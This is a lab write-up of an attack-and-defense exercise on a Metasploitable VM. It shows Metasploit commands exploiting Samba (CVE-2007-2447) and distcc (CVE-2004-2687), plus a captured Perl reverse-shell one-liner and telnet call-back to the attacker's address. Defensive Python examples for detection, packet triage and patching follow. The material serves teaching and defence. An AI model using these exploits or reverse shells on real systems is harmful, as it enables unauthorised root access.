Linux operating system security protection

Linux system attack and defense confrontation practice

1. Practical content

  • In the Metasploit framework, find an exploit module for a Linux network service, deploy a vulnerable instance of that service in the attack-and-defense lab environment (for a third-party service this means locating and installing the specific version that carries the flaw), and attack it with Metasploit.

  • The attacker uses Metasploit to attack the Linux Metasploitable target; the defender runs tcpdump, Wireshark or Snort on Metasploitable to capture the attack traffic, works out which security vulnerability was exploited, patches it with the fix published on the vendor's official site, and the two sides jointly write up the attack-and-defense process.

2. Experimental environment

  • The following environment was deployed for this exercise.
  • Attacker and defender each use a laptop, and the two are connected directly into one LAN. VMware Workstation runs on both laptops and hosts the attacking machine, the scanning machine and the defending machine. The attacker uses BackTrack 4 for exploitation and a WinXPattacker VM for scanning; the defender runs the Ubuntu 8.04 Metasploitable system.
  • As shown in the figure below, the three virtual machines are bridged onto the LAN. The attacking machine is 192.168.200.10, the scanning machine is 192.168.200.2 and the defending machine is 192.168.200.11.

3. Offensive and defensive practice process

  • Both sides first start their virtual machines, configure the network and confirm connectivity, then proceed with their respective steps.

    Attacking process

    Vulnerability scan and result analysis

  • To confirm which vulnerabilities the defender's system has, the attacker ran X-Scan 3.3 from the scanning machine for a full vulnerability scan of the defender.

  • The services exposed by the defending machine and the specific flaws found are as follows:

  • The detailed scan report yields a lot of useful information about the host:
  • a) From port 139 (NetBIOS session service) the hostname "METASPLOITABLE" and the server comment "metasploitable server (Samba 3.0.20-Debian)" are obtained;
  • b) The host has 35 user accounts, of which 33 are disabled; the accounts user and msfadmin are active;
  • c) Weak passwords: user and msfadmin have passwords identical to their usernames. From the scanning machine, net use can establish an SMB connection and list the shares. FTP reports its banner as ProFTPD 1.3.1 Server (Debian), and the user account also works over FTP;
  • d) Telnet is open and identifies the system as Ubuntu 8.04. user and msfadmin can log in over telnet and obtain their respective privileges; even without a weak password, telnet is unencrypted, so a password could be recovered by sniffing the session.

Choice of attack

  • From the above results, the easiest route in is to log in over telnet as user or msfadmin, but that is not the purpose of this exercise, so we set the weak-password problem aside and use vulnerabilities in third-party software to gain control of the system.

The scan shows that the defending machine has many vulnerabilities; among them, the SMB and distcc flaws are usable for an attack. SMB is served by Samba, and the smbd daemon runs as root, so a successful exploit yields a root shell directly. In this exercise we mainly attack through the SMB vulnerability and also try the distcc vulnerability.

Attack intrusion

  • With the analysis complete we come to the main event: the attack itself.
  • In a terminal on the attacking machine, run
  • msfconsole
  • This starts the attack tool we will use, Metasploit, as shown below.

  • First we attack the defending machine through the SMB vulnerability, using a reverse payload (the target connects back to the attacker, which also works when a firewall blocks inbound connections; since there is no firewall here, any shell payload would do and the choice is arbitrary). Enter the following commands in turn to exploit the SMB vulnerability:

use exploit/multi/samba/usermap_script
set payload cmd/unix/reverse
set rhost 192.168.200.11
set lhost 192.168.200.10
exploit

  • As shown in the figure below, the exploit returned a shell running as root: the attack succeeded.

  • Disconnect the current session, then enter the following commands in turn to attack through the distcc vulnerability:
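Why a Samba exploit hands over a root shell: the usermap_script module abuses CVE-2007-2447, where smbd passed the client-supplied username through /bin/sh when invoking the configured "username map script", so shell metacharacters in the username ran with smbd's privileges. The following is an added illustration of that vulnerable pattern beside its hardened form; it is not Samba's code or the Metasploit module, and the script stand-in (echo), the injected username and the allowlist are assumptions made for the demo.

```python
"""Command-injection pattern behind CVE-2007-2447 (Samba 'username map script').

Added illustration; not Samba's code. smbd handed the client-supplied username
to /bin/sh when running the configured 'username map script', so backticks in
the username were executed by the shell with smbd's privileges (root).
map_user_vulnerable() mirrors that shape; map_user_hardened() shows the fix.
The script path and usernames below are assumptions for the demo.
"""
import re
import subprocess

# Stand-in for the script named by 'username map script' in smb.conf. Using
# 'echo' keeps the demo runnable offline and prints exactly the arguments that
# reached the script. (Assumed for the demo; not Metasploitable's real script.)
MAP_SCRIPT = "echo"

# Shape of what the Metasploit usermap_script module puts in the username
# field: an attacker-chosen command wrapped in backticks. The command here is
# harmless and constructed for the demo; the real module launches a shell.
INJECTED_USER = "/=`echo INJECTED`"


def map_user_vulnerable(username: str) -> str:
    """Vulnerable pattern: the raw username is spliced into a command line that
    is handed to /bin/sh -c, so any backticks in it run as the caller.
    Returns what the map script actually saw on its command line."""
    cmd = f"{MAP_SCRIPT} {username}"
    out = subprocess.run(["/bin/sh", "-c", cmd],
                         capture_output=True, text=True, check=True)
    return out.stdout.strip()


# Conservative allowlist for account names; anything else is refused outright.
USERNAME_RE = re.compile(r"[A-Za-z0-9._-]{1,64}")


def map_user_hardened(username: str) -> str:
    """Hardened pattern: validate the username against an allowlist, then run
    the script with an argv list and no shell, so metacharacters are inert."""
    if not USERNAME_RE.fullmatch(username):
        raise ValueError(f"rejected username: {username!r}")
    out = subprocess.run([MAP_SCRIPT, username],
                         capture_output=True, text=True, check=True)
    return out.stdout.strip()


def is_rejected(username: str) -> bool:
    """True if the hardened path refuses the username."""
    try:
        map_user_hardened(username)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    # The injected command ran: the script received "/=INJECTED", not the
    # literal backtick expression the client sent.
    print("vulnerable path saw:", map_user_vulnerable(INJECTED_USER))
    print("hardened path saw:  ", map_user_hardened("msfadmin"))
    print("hardened rejects injected name:", is_rejected(INJECTED_USER))
```

The hardened version does two independent things, and both matter: the allowlist stops the metacharacters at the door, and the argv form means that even a name that slips past validation is passed to the script as a single argument rather than parsed by a shell.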

back
use exploit/unix/misc/distcc_exec
set payload cmd/unix/reverse_perl
set rhost 192.168.200.11
set lhost 192.168.200.10
exploit

As shown in the figure below, a usable shell appears once the exploit succeeds, but it does not run as root.

Subsequent commands got no response; it was later confirmed that the defender had killed the session by hand.
To run privileged commands we need a root shell, so the SMB vulnerability is exploited again. Enter the following on the command line:

back
use exploit/multi/samba/usermap_script
set payload cmd/unix/reverse
set rhost 192.168.200.11
set lhost 192.168.200.10
exploit

  • Then run reboot in the shell obtained, as shown below.

  • The defending machine reboots: the attack succeeded.

Defensive process

  • Signs of attack observed on the defending machine
  • Immediately after the defending machine boots, capture every packet it sends and receives with the following command, writing them to result.cap (-s 0 disables the snapshot length so full payloads are recorded; older tcpdump versions default to 68 bytes, which would truncate the shell traffic we want to read later):

sudo tcpdump -s 0 -w result.cap &

  • After a while, list the system processes with

ps -e | more

  • Several suspicious telnet processes were found; these were later confirmed to be the shells used in the attack. As shown below,

  • The telnet processes were killed without hesitation. Shortly afterwards a broadcast message from root was received and the machine rebooted...
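ps -e shows only command names, so the attacker's telnet looks like any other telnet. What gives it away is its parentage: a telnet or perl whose ancestors include smbd or distccd is the call-back leg of an exploit, while a shell under sshd is an ordinary login. The following is an added example (not from the page) that walks parent PIDs in ps output to make that distinction; the process listing is constructed to mirror the scenario above (usermap_script payload: smbd -> sh -> sh -> telnet; distcc_exec payload: distccd -> sh -> perl), and the daemon and tool name lists are assumptions. On a live system the input would come from ps -eo pid,ppid,user,comm.

```python
"""Find shells spawned by network daemons, from 'ps -eo pid,ppid,user,comm'.

Added example; not from the page. The listing below is constructed to mirror
the page's scenario. The daemon and tool lists are assumptions.
"""

# Daemons that have no business spawning interactive tools. sshd, login and
# getty are deliberately absent: spawning shells is their job.
SERVICE_DAEMONS = {"smbd", "nmbd", "distccd", "proftpd", "apache2"}
SHELL_TOOLS = {"sh", "bash", "telnet", "perl", "nc", "python"}

# Constructed sample; shape of 'ps -eo pid,ppid,user,comm' output.
SAMPLE_PS = """\
  PID  PPID USER     COMMAND
    1     0 root     init
 4421     1 root     smbd
 4430  4421 root     smbd
 5102  4430 root     sh
 5104  5102 root     sh
 5105  5104 root     telnet
 4610     1 daemon   distccd
 5210  4610 daemon   sh
 5211  5210 daemon   perl
 3011     1 root     sshd
 3120  3011 msfadmin bash
 3122  3120 msfadmin telnet
"""


def parse_ps(text):
    """Map pid -> (ppid, user, comm) from 'ps -eo pid,ppid,user,comm' output."""
    procs = {}
    for line in text.splitlines()[1:]:           # skip the header row
        pid, ppid, user, comm = line.split(None, 3)
        procs[int(pid)] = (int(ppid), user, comm)
    return procs


def ancestry(procs, pid):
    """Command names from pid up to init (guards against ppid loops)."""
    chain, seen = [], set()
    while pid in procs and pid not in seen:
        seen.add(pid)
        chain.append(procs[pid][2])
        pid = procs[pid][0]
    return chain


def find_spawned_shells(procs):
    """Return (pid, user, ancestry) for shell tools that descend from a daemon."""
    hits = []
    for pid, (_ppid, user, comm) in sorted(procs.items()):
        if comm not in SHELL_TOOLS:
            continue
        chain = ancestry(procs, pid)
        if any(name in SERVICE_DAEMONS for name in chain[1:]):
            hits.append((pid, user, chain))
    return hits


if __name__ == "__main__":
    for pid, user, chain in find_spawned_shells(parse_ps(SAMPLE_PS)):
        print(f"pid {pid} ({user}): {' <- '.join(chain)}")
```

When a chain is found, kill it from the top (the sh directly under smbd or distccd), not only the telnet at the bottom, and record the listing first: it is evidence of which service was exploited, which the packet analysis below then confirms.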

Packet Analysis

  • To find the real reason for the reboot, the network was disconnected as soon as the machine restarted, and the capture file was exported and analysed with Wireshark.
  • A first look at the capture shows 128768 packets in just 30 minutes. Most of that volume is traffic of a single protocol arriving in runs, as shown in the figure below.

From this it follows that the attacking side was scanning, and the real attack should be at the end. Reading the packets from the end backwards, the second-to-last packet is a TCP data segment whose content is exactly reboot. That command is what caused the system to restart.

Careful analysis of the packets shows three attacks, as in the following figure. The vulnerability exploited, the attack script delivered and the commands executed in each are:

Attack 1
  Vulnerability: SMB (Samba) vulnerability, CVE-2007-2447
  Reference: http://www.samba.org/samba/security/CVE-2007-2447.html
  Attack script (as captured, truncated): nohup sh -c '(sleep 4495 telnet 192.168.200.10 4444
  Commands executed: (not listed)

Attack 2
  Vulnerability: distcc vulnerability, CVE-2004-2687
  Reference: http://cve.mitre.org/cgi-bin/cvename.cgi?name=2004-2687
  Attack script: perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"192.168.200.10:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
  Commands executed: id, users

Attack 3
  Vulnerability, reference and attack script: same as attack 1
  Commands executed: id, reboot
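Finding three attacks in 128768 packets by reading backwards works once, but the same triage can be automated: the victim should never initiate a TCP connection to a LAN peer, and the two payloads and the final command carry recognisable strings. The following is an added example (not from the page) with a minimal libpcap/Ethernet/IPv4/TCP parser and a triage pass; the capture is constructed in memory with the page's addresses, the SMB framing around the injected username is omitted and only the captured fragment is embedded, and the indicator strings and port numbers are assumptions drawn from the table above.

```python
"""Triage a libpcap capture for reverse-shell traffic without Wireshark.

Added example; not from the page. Flags (1) the victim opening an outbound TCP
connection and (2) payload strings characteristic of the two Metasploit
payloads in the capture and of the final 'reboot'. The sample capture is
constructed in memory; indicator strings are assumptions from the page's table.
"""
import socket
import struct
from collections import namedtuple

ATTACKER, SCANNER, VICTIM = "192.168.200.10", "192.168.200.2", "192.168.200.11"
SYN, ACK, PSH = 0x02, 0x10, 0x08

Pkt = namedtuple("Pkt", "ts src sport dst dport flags payload")


def tcp_frame(src, sport, dst, dport, flags, payload=b""):
    """Build Ethernet + IPv4 + TCP bytes (checksums left zero; fine for parsing)."""
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 0, 0, 5 << 4, flags, 8192, 0, 0) + payload
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 1, 0, 64, 6, 0,
                     socket.inet_aton(src), socket.inet_aton(dst))
    return b"\x00" * 12 + b"\x08\x00" + ip + tcp


def pcap_bytes(records):
    """Serialise (timestamp, frame) pairs as a little-endian pcap file."""
    out = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)
    for ts, frame in records:
        out += struct.pack("<IIII", int(ts), int(ts % 1 * 1e6), len(frame), len(frame)) + frame
    return out


def parse_pcap(data):
    """Return a Pkt for every IPv4/TCP frame; other frames are skipped."""
    magic = struct.unpack("<I", data[:4])[0]
    order = "<" if magic == 0xA1B2C3D4 else ">"
    pos, pkts = 24, []
    while pos + 16 <= len(data):
        sec, usec, incl, _orig = struct.unpack(order + "IIII", data[pos:pos + 16])
        frame, pos = data[pos + 16:pos + 16 + incl], pos + 16 + incl
        if len(frame) < 54 or frame[12:14] != b"\x08\x00" or frame[23] != 6:
            continue                                   # not IPv4 over Ethernet, or not TCP
        ihl = (frame[14] & 0x0F) * 4
        total = struct.unpack("!H", frame[16:18])[0]
        ip, tcp = frame[14:14 + ihl], frame[14 + ihl:14 + total]
        sport, dport = struct.unpack("!HH", tcp[:4])
        doff = (tcp[12] >> 4) * 4
        pkts.append(Pkt(sec + usec / 1e6, socket.inet_ntoa(ip[12:16]), sport,
                        socket.inet_ntoa(ip[16:20]), dport, tcp[13], tcp[doff:]))
    return pkts


INDICATORS = {
    b"nohup sh -c": "Samba usermap_script payload (CVE-2007-2447)",
    b"perl -MIO":   "distcc_exec reverse_perl payload (CVE-2004-2687)",
    b"reboot":      "reboot issued over an established channel",
}


def triage(pkts, victim):
    """Return (ts, description) findings; plain scan probes produce none."""
    findings = []
    for p in pkts:
        if p.src == victim and p.flags & SYN and not p.flags & ACK:
            findings.append((p.ts, f"{victim} initiated TCP to {p.dst}:{p.dport} (reverse shell?)"))
        for needle, what in INDICATORS.items():
            if needle in p.payload:
                findings.append((p.ts, f"{p.src}:{p.sport} -> {p.dst}:{p.dport}: {what}"))
    return findings


# Constructed sample capture: scanner probes, the SMB exploit carrying the
# fragment shown in the page's table, the call-back shell, and the commands.
SAMPLE_CAPTURE = pcap_bytes([
    (100.0, tcp_frame(SCANNER, 40001, VICTIM, 139, SYN)),
    (100.1, tcp_frame(SCANNER, 40002, VICTIM, 445, SYN)),
    (101.0, tcp_frame(ATTACKER, 50001, VICTIM, 139, PSH | ACK,
                      b"nohup sh -c '(sleep 4495 telnet 192.168.200.10 4444")),
    (101.2, tcp_frame(VICTIM, 33001, ATTACKER, 4444, SYN)),
    (101.3, tcp_frame(ATTACKER, 4444, VICTIM, 33001, PSH | ACK, b"id\n")),
    (102.0, tcp_frame(ATTACKER, 4444, VICTIM, 33001, PSH | ACK, b"reboot\n")),
])

if __name__ == "__main__":
    for ts, what in triage(parse_pcap(SAMPLE_CAPTURE), VICTIM):
        print(f"{ts:8.1f}  {what}")
```

To run it on the real result.cap, replace SAMPLE_CAPTURE with open("result.cap", "rb").read(); the outbound-SYN rule is the one that survives payload changes, since any reverse shell has to connect back regardless of which exploit delivered it.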

Bugfix

  • Since the defending machine runs Ubuntu, upgrading the affected software to the current packaged version is straightforward. CVE-2007-2447 was fixed in Samba 3.0.25, and the Ubuntu 8.04 archive carries a newer Samba than the 3.0.20 reported by the scan, so run:

sudo apt-get update
sudo apt-get install samba

  • Afterwards confirm the installed version with smbd -V. The vulnerable code path is only reached when smb.conf sets a "username map script"; testparm -s | grep "username map script" shows whether it is configured, and removing that option is a valid mitigation on its own.

  • Alternatively, stop the affected services:

sudo /etc/init.d/samba stop
sudo /etc/init.d/distcc stop

  • Upgrading distcc, however, reports that no newer version is available. CVE-2004-2687 is not a defect of one release but distccd executing the compilation jobs of any unauthenticated client when access to its port is not restricted, so download the latest release from the distcc site, remove the old one and install it, and in any case run distccd with --allow limited to the trusted build network (or firewall its port) rather than leaving it reachable from the whole LAN.

4. Summary of Offensive and Defensive Practices

Problems encountered in practice and lessons learned:

  • Attacking side
  • a) Vulnerability selection: documentation already lists the vulnerabilities of the Metasploitable target, so using it narrows down the exploits worth trying;
  • b) If the shell obtained is not root, a local privilege-escalation exploit is needed next; I had very little information on such vulnerabilities.
  • Defending side
  • a) The number of captured packets is huge, and picking the useful information out of them is hard.
  • b) Inferring which vulnerabilities were exploited from the attack traffic requires considerable background knowledge and proficiency with search engines and vendors' official sites.
